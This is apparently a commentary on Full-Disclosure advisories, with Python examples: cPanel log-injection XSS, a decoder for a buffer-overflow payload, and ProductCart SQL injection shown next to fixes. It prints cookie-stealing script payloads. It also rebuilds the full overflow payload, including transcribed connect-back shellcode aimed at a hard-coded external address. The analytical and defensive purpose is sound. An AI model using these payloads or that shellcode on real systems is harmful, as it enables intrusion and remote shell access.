> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
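For the cPanel advisory in Message 6 above (log lines shown to the administrator without escaping), the following is an added example; it is not cPanel's code and not from Ory Segal's post. It renders constructed Apache error-log lines the way the advisory describes them (raw, inside <pre>), renders the 'Latest Visitors' links the same way, puts the escaped versions beside them, and scans the log for request paths that carry markup. The advisory's own log line and its two requests are reused; the second log line, the list names and the function names are constructed here.

```python
"""Log-injection XSS as described in the cPanel advisory: the request path
from an Apache error-log line is dropped into the admin's page unescaped.

Added example, not cPanel code. The log lines and paths are constructed
(the first log line and the two hostile requests are the advisory's own).
"""
import html
import re

# Constructed sample log: the advisory's line plus one carrying the payload.
ERROR_LOG = [
    "[Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist: "
    "/home/dir/public_html/foobar.html",
    "[Tue Jun 17 08:42:02 2003] [error] [client x.x.x.x] File does not exist: "
    "/home/dir/public_html/<script>alert(document.cookie);</script>",
]

# 'Latest Visitors' renders the path inside an <a> tag, so the payload has to
# close that tag first (the advisory's second request).
VISITOR_PATHS = [
    "/index.html",
    '/"></a><script>alert(document.cookie);</script>',
]


def render_error_log_vulnerable(lines):
    """What the advisory describes: raw log lines inside <pre>."""
    return "<pre>\n" + "\n".join(lines) + "\n</pre>"


def render_error_log(lines):
    """Hardened: every line is HTML-escaped before it reaches the browser."""
    return "<pre>\n" + "\n".join(html.escape(l, quote=True) for l in lines) + "\n</pre>"


def render_visitors_vulnerable(paths):
    """The 'Latest Visitors' pattern: the raw path in both href and link text."""
    return "\n".join(f'<a href="{p}">{p}</a>' for p in paths)


def render_visitors(paths):
    """Hardened: quote=True also escapes the quote characters that would
    otherwise end the href attribute."""
    return "\n".join(
        f'<a href="{html.escape(p, quote=True)}">{html.escape(p, quote=True)}</a>'
        for p in paths
    )


_ERRLOG_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<client>[^\]]+)\] (?P<msg>.*)$"
)
_HTML_META = re.compile(r"[<>\"']")


def suspicious_log_lines(lines):
    """Detection side: (client, message) for every log line whose free-text
    part carries HTML metacharacters, i.e. markup arrived in a request path."""
    hits = []
    for line in lines:
        m = _ERRLOG_RE.match(line)
        if m and _HTML_META.search(m.group("msg")):
            hits.append((m.group("client"), m.group("msg")))
    return hits
```

Escaping at the point where the log text is written into HTML is the whole fix; the log file itself should keep the raw request so the detection side can still see what was sent.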
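For Dave Korn's analysis in Message 7, the script below is an added example, not code from his post. It rebuilds the one-line hello-world.c from the layout he lists, splits it back into filler, return addresses, NOP sled and shellcode, and then reads the syscall numbers and the constants out of the shellcode bytes transcribed from his objdump output, which answers the question he leaves open about what the int 0x80 calls do. The byte values and the 0xbffff321 address come from the post; the function names, the parser and the pattern-matching heuristics are this example's own assumptions.

```python
"""Decode the hello-world.c payload from Dave Korn's post.

Added example, not code from the post. The file is rebuilt from the layout
he lists (256 x 'A', 8 x 0xbffff321, 600 x NOP, shellcode, CR LF) and the
shellcode bytes are transcribed from his objdump listing, so this runs
offline. The parsing heuristics are this example's own assumptions.
"""
import re
import struct

RET_ADDR = 0xBFFFF321  # return-address overwrite named in the post

# Shellcode bytes transcribed from the objdump output (offsets 0x09-0x8b).
SHELLCODE = bytes.fromhex(
    "31c031db31c951b10651b10151b1025189e1b301b066cd80"     # socketcall(SYS_SOCKET, [2,1,6])
    "89c231c031c9515168d462f7cc6668b0efb1026651"          # build sockaddr_in on the stack
    "89e7b310535752" "89e1b303b066cd80"                   # socketcall(SYS_CONNECT, [fd,&sa,16])
    "31c939c17406" "31c0b001cd80"                         # if connect failed: exit(1)
    "31c0b03f89d3cd80"                                    # dup2(fd, 0)
    "31c0b03f89d3b101cd80"                                # dup2(fd, 1)
    "31c0b03f89d3b102cd80"                                # dup2(fd, 2)
    "31c031d250686e2f7368682f2f626989e3505389e1b00bcd80"  # execve("//bin/sh", ["//bin/sh"], NULL)
    "31c0b001cd80"                                        # exit(0)
)

SYSCALL_NAMES = {0x01: "exit", 0x0B: "execve", 0x3F: "dup2", 0x66: "socketcall"}
SOCKETCALL_NAMES = {1: "socket", 3: "connect"}


def build_payload():
    """Reconstruct the single line of hello-world.c as the post lays it out."""
    return (b"A" * 256
            + struct.pack("<I", RET_ADDR) * 8
            + b"\x90" * 600
            + SHELLCODE
            + b"\r\n")


def parse_layout(blob):
    """Split the line into filler, return addresses, NOP sled and shellcode
    without knowing the sizes: filler is the run of 'A', the return addresses
    are the DWORDs up to the first 0x90, the sled is the run of 0x90."""
    blob = blob.rstrip(b"\r\n")
    filler = len(blob) - len(blob.lstrip(b"A"))
    pos = filler
    ret_addrs = []
    while pos + 4 <= len(blob) and blob[pos] != 0x90:
        ret_addrs.append(struct.unpack_from("<I", blob, pos)[0])
        pos += 4
    sled_start = pos
    while pos < len(blob) and blob[pos] == 0x90:
        pos += 1
    return {"filler": filler, "ret_addrs": ret_addrs,
            "nop_sled": pos - sled_start, "shellcode_offset": pos,
            "shellcode": blob[pos:]}


def syscall_trace(code):
    """For each int 0x80 (cd 80) take the last 'mov $imm8,%al' (b0 XX) before
    it as the syscall number and, for socketcall, the last 'mov $imm8,%bl'
    (b3 XX) as the sub-function. Only valid for straight-line code like this."""
    trace, start = [], 0
    for m in re.finditer(rb"\xcd\x80", code):
        block = code[start:m.start()]
        al = block.rfind(b"\xb0")
        if al < 0:
            trace.append("?")
        else:
            nr = block[al + 1]
            name = SYSCALL_NAMES.get(nr, hex(nr))
            if nr == 0x66:
                bl = block.rfind(b"\xb3")
                name += ":" + SOCKETCALL_NAMES.get(block[bl + 1], str(block[bl + 1]))
            trace.append(name)
        start = m.end()
    return trace


def connect_target(code):
    """sin_addr is pushed with 'push $imm32' and sin_port with 'pushw $imm16';
    the immediates were chosen so the bytes land in memory in network order."""
    m = re.search(rb"\x68(.{4})\x66\x68(.{2})", code, re.DOTALL)
    if not m:
        return None
    return ".".join(str(b) for b in m.group(1)), struct.unpack(">H", m.group(2))[0]


def exec_path(code):
    """Two 'push $imm32' followed by 'mov %esp,%ebx' (89 e3) spell the path;
    the second push lands at the lower address, so it comes first."""
    m = re.search(rb"\x68(.{4})\x68(.{4})\x89\xe3", code, re.DOTALL)
    return (m.group(2) + m.group(1)).decode() if m else None


if __name__ == "__main__":
    layout = parse_layout(build_payload())
    print(layout["filler"], hex(layout["ret_addrs"][0]), layout["nop_sled"],
          hex(layout["shellcode_offset"]))
    print(syscall_trace(layout["shellcode"]))
    print(connect_target(layout["shellcode"]), exec_path(layout["shellcode"]))
```

The trace comes out as socket, connect, exit (taken only when connect fails), three dup2 calls, execve and exit, with the connect target read straight from the push instructions: a connect-back shell with stdin, stdout and stderr on the socket, which is the answer to the mkdir question in the post. The heuristics (last mov to %al before each int 0x80, the push/pushw pair for the sockaddr) only hold for straight-line shellcode like this one; anything that branches, or decodes itself, needs a real disassembler.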
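For the ProductCart thread (Messages 1-3 and 8): the ODBC error gyrniff pasted shows the UPDATE statement with the submitted name spliced into its text, which is why a single quote character breaks it. The block below is an added example, not ProductCart's code: sqlite3 stands in for the Access database, the customers table (column names taken from the error message) and its one row are constructed here, and it shows the concatenated statement failing on Paul' while a parameterised statement stores the same value.

```python
"""SQL built by string concatenation, as the ODBC error in gyrniff's post
reveals, next to a parameterised statement.

Added example, not ProductCart code. sqlite3 stands in for the Access
database; the customers table, its column names (taken from the error
message) and the single row are constructed here.
"""
import sqlite3


def fresh_db():
    con = sqlite3.connect(":memory:")
    con.execute("""CREATE TABLE customers (
        idCustomer INTEGER PRIMARY KEY, firstName TEXT, lastName TEXT,
        customerCompany TEXT, address TEXT, city TEXT, zip TEXT,
        stateCode TEXT, CountryCode TEXT, phone TEXT)""")
    # Constructed row; not the data from the post.
    con.execute("INSERT INTO customers VALUES (115, 'Ann', 'Example', 'Example Co',"
                " '1 Main St', 'Springfield', '00000', 'XX', 'US', '000 000 0000')")
    return con


def update_customer_concat(con, cid, first, last, state):
    """The pattern the error message shows: submitted values pasted into the
    SQL text, so a quote in the data ends the literal early."""
    sql = ("UPDATE customers SET firstName='" + first + "', lastName='" + last
           + "', stateCode='" + state + "' WHERE idCustomer=" + str(cid))
    con.execute(sql)
    con.commit()
    return sql


def update_customer_param(con, cid, first, last, state):
    """Hardened: placeholders. The driver hands the values to the engine
    separately from the statement, so data can never become SQL syntax."""
    con.execute("UPDATE customers SET firstName=?, lastName=?, stateCode=?"
                " WHERE idCustomer=?", (first, last, state, cid))
    con.commit()


def customer(con, cid):
    row = con.execute("SELECT firstName, lastName, stateCode FROM customers"
                      " WHERE idCustomer=?", (cid,)).fetchone()
    return tuple(row) if row else None


def demo(first="Paul'"):
    """Run both versions on the same input and report what happened."""
    con = fresh_db()
    result = {}
    try:
        update_customer_concat(con, 115, first, "Smith", "CA")
        result["concat"] = customer(con, 115)
    except sqlite3.Error:
        result["concat"] = "syntax error"   # the failure the ODBC driver reported
    update_customer_param(con, 115, first, "Smith", "CA")
    result["param"] = customer(con, 115)
    return result


if __name__ == "__main__":
    print(demo())          # concat: syntax error, param: stores Paul'
    print(demo("Paul"))    # both versions agree on harmless input
```

The error page is also the information leak: the driver echoed the full statement, including the other columns and the WHERE clause, which is what turns a stray quote into a map of the query. Disabling detailed ODBC errors in the response is the short-term mitigation; parameterised statements are the fix. The database-download problem from Tri Huynh's advisory is separate and is not fixed by any change to the query code: a file under the web root is served like any other file, so the .mdb has to live outside the document root or be blocked at the web server, as the workaround says.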
